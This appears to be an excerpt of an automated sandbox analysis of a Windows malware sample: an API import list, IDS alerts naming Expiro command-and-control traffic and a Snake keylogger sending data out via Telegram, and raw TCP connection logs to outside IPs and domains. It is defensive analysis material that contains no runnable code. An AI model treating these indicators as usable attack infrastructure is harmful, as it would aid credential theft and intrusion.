                                                                                                                                                  KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                                                                                                  USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                                                                                                  GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                                                                                                  COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                                                                                                  ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                                                                                                  SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                                                                                                  ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                                                                                                  OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                                                                                                  Possible Origin

                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                  EnglishGreat Britain

                                                                                                                                                  Network Behavior

                                                                                                                                                  Suricata IDS Alerts

                                                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                  2024-12-10T16:24:14.594215+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz154.244.188.17780192.168.2.749702TCP
                                                                                                                                                  2024-12-10T16:24:14.594215+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst154.244.188.17780192.168.2.749702TCP
                                                                                                                                                  2024-12-10T16:24:16.280523+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749708193.122.6.16880TCP
                                                                                                                                                  2024-12-10T16:24:17.429865+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz118.141.10.10780192.168.2.749709TCP
                                                                                                                                                  2024-12-10T16:24:17.429865+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst118.141.10.10780192.168.2.749709TCP
                                                                                                                                                  2024-12-10T16:24:19.430559+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.74971654.244.188.17780TCP
                                                                                                                                                  2024-12-10T16:24:22.325560+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz144.221.84.10580192.168.2.749727TCP
                                                                                                                                                  2024-12-10T16:24:22.325560+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst144.221.84.10580192.168.2.749727TCP
                                                                                                                                                  2024-12-10T16:24:22.340004+01002051648ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz)1192.168.2.7642981.1.1.153UDP
                                                                                                                                                  2024-12-10T16:24:24.389865+01002803274ETPRO MALWARE Common Downloader Header Pattern UH2192.168.2.749708193.122.6.16880TCP
                                                                                                                                                  2024-12-10T16:24:26.952913+01002057744ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram1192.168.2.749736149.154.167.220443TCP
                                                                                                                                                  2024-12-10T16:24:28.998498+01002051649ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz)1192.168.2.7638921.1.1.153UDP
                                                                                                                                                  2024-12-10T16:25:41.188310+01002850851ETPRO MALWARE Win32/Expiro.NDO CnC Activity1192.168.2.74987282.112.184.19780TCP
                                                                                                                                                  2024-12-10T16:26:07.491789+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz147.129.31.21280192.168.2.749966TCP
                                                                                                                                                  2024-12-10T16:26:07.491789+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst147.129.31.21280192.168.2.749966TCP
                                                                                                                                                  2024-12-10T16:26:10.308197+01002018141ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz113.251.16.15080192.168.2.749972TCP
                                                                                                                                                  2024-12-10T16:26:10.308197+01002037771ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst113.251.16.15080192.168.2.749972TCP

                                                                                                                                                  Network Port Distribution

                                                                                                                                                  TCP Packets

                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                  Dec 10, 2024 16:24:12.872718096 CET4970180192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:12.991986036 CET804970154.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:12.992096901 CET4970180192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:13.014163017 CET4970280192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:13.038033962 CET4970180192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:13.038115978 CET4970180192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:13.133850098 CET804970254.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:13.133955956 CET4970280192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:13.134259939 CET4970280192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:13.134322882 CET4970280192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:13.157423973 CET804970154.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:13.157485962 CET804970154.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:13.254983902 CET804970254.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:13.255012989 CET804970254.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:14.337663889 CET804970154.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:14.338078976 CET804970154.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:14.338140011 CET4970180192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:14.425139904 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:24:14.474680901 CET804970254.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:14.474742889 CET804970254.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:14.474791050 CET4970280192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:14.474864006 CET4970280192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:14.515625000 CET4970180192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:14.544408083 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:14.544487953 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:24:14.544823885 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:24:14.594214916 CET804970254.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:14.665361881 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:15.124764919 CET4970980192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:15.244227886 CET804970918.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:15.244374037 CET4970980192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:15.244730949 CET4970980192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:15.244730949 CET4970980192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:15.364280939 CET804970918.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:15.364425898 CET804970918.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:15.817994118 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:15.823390961 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:24:15.943402052 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:16.229127884 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:16.280523062 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:24:16.897190094 CET49715443192.168.2.7104.21.67.152
                                                                                                                                                  Dec 10, 2024 16:24:16.897244930 CET44349715104.21.67.152192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:16.897314072 CET49715443192.168.2.7104.21.67.152
                                                                                                                                                  Dec 10, 2024 16:24:17.009179115 CET49715443192.168.2.7104.21.67.152
                                                                                                                                                  Dec 10, 2024 16:24:17.009196997 CET44349715104.21.67.152192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:17.245935917 CET804970918.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:17.246032953 CET804970918.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:17.246112108 CET4970980192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:17.308262110 CET4970980192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:17.429864883 CET804970918.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:17.962205887 CET4971680192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:18.081717968 CET804971654.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:18.081819057 CET4971680192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:18.081989050 CET4971680192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:18.082005024 CET4971680192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:18.202076912 CET804971654.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:18.202092886 CET804971654.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:18.231993914 CET44349715104.21.67.152192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:18.232069016 CET49715443192.168.2.7104.21.67.152
                                                                                                                                                  Dec 10, 2024 16:24:18.238039970 CET49715443192.168.2.7104.21.67.152
                                                                                                                                                  Dec 10, 2024 16:24:18.238046885 CET44349715104.21.67.152192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:18.238405943 CET44349715104.21.67.152192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:18.280455112 CET49715443192.168.2.7104.21.67.152
                                                                                                                                                  Dec 10, 2024 16:24:18.292227030 CET49715443192.168.2.7104.21.67.152
                                                                                                                                                  Dec 10, 2024 16:24:18.335340977 CET44349715104.21.67.152192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:18.677464008 CET44349715104.21.67.152192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:18.677530050 CET44349715104.21.67.152192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:18.677582979 CET49715443192.168.2.7104.21.67.152
                                                                                                                                                  Dec 10, 2024 16:24:18.683067083 CET49715443192.168.2.7104.21.67.152
                                                                                                                                                  Dec 10, 2024 16:24:19.430260897 CET804971654.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:19.430524111 CET804971654.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:19.430558920 CET4971680192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:19.431195021 CET4971680192.168.2.754.244.188.177
                                                                                                                                                  Dec 10, 2024 16:24:19.551841974 CET804971654.244.188.177192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:21.104758978 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:21.227498055 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:21.227607012 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:21.235524893 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:21.235548973 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:21.354918957 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:21.354933977 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:22.325201988 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:22.325351000 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:22.325560093 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:22.325835943 CET4972780192.168.2.744.221.84.105
                                                                                                                                                  Dec 10, 2024 16:24:22.444806099 CET804972744.221.84.105192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:22.960784912 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:23.080198050 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:23.080302954 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:23.080528021 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:23.080619097 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:23.199898958 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:23.200014114 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:23.931077003 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:24:24.050472975 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:24.217123032 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:24.264908075 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:24.335911989 CET8049708193.122.6.168192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:24.389864922 CET4970880192.168.2.7193.122.6.168
                                                                                                                                                  Dec 10, 2024 16:24:24.850805044 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:24.850857019 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:24.850922108 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:24.851960897 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:24.851983070 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:25.057353973 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:24:25.179490089 CET804974172.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:25.179574013 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:24:25.179752111 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:24:25.299043894 CET804974172.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.232204914 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.232698917 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:26.234596968 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:26.234607935 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.234952927 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.236915112 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:26.283333063 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.283406019 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:26.283418894 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.348642111 CET804974172.52.179.174192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.446080923 CET4974180192.168.2.772.52.179.174
                                                                                                                                                  Dec 10, 2024 16:24:26.788472891 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:26.907721043 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.907799006 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:26.908724070 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:26.952945948 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.953474045 CET44349736149.154.167.220192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:26.953552008 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:26.953963041 CET49736443192.168.2.7149.154.167.220
                                                                                                                                                  Dec 10, 2024 16:24:27.028012037 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.200849056 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.201351881 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.201412916 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.202661991 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.202676058 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.202718973 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.205384970 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.205398083 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.205440998 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.208373070 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.208412886 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.208462000 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.211345911 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.211359978 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.211404085 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.320898056 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.321336031 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.322058916 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.440660000 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.440675974 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.440834045 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.496308088 CET804974576.223.26.96192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.568732977 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:28.568873882 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:28.626753092 CET4974580192.168.2.776.223.26.96
                                                                                                                                                  Dec 10, 2024 16:24:28.689446926 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.689462900 CET8049734172.234.222.138192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:28.750345945 CET4973480192.168.2.7172.234.222.138
                                                                                                                                                  Dec 10, 2024 16:24:29.910882950 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:30.030323982 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:30.030510902 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:30.030884027 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:30.031089067 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:30.151407003 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:30.151711941 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:32.045830965 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:32.045964003 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:32.046014071 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:32.056807041 CET4975680192.168.2.718.141.10.107
                                                                                                                                                  Dec 10, 2024 16:24:32.177256107 CET804975618.141.10.107192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:33.639868975 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:33.759186029 CET804976382.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:33.760617971 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:33.760775089 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:33.760775089 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:33.880078077 CET804976382.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:33.880439043 CET804976382.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:55.667368889 CET804976382.112.184.197192.168.2.7
                                                                                                                                                  Dec 10, 2024 16:24:55.667462111 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.667503119 CET4976380192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.708422899 CET4981580192.168.2.782.112.184.197
                                                                                                                                                  Dec 10, 2024 16:24:55.789789915 CET804976382.112.184.197192.168.2.7
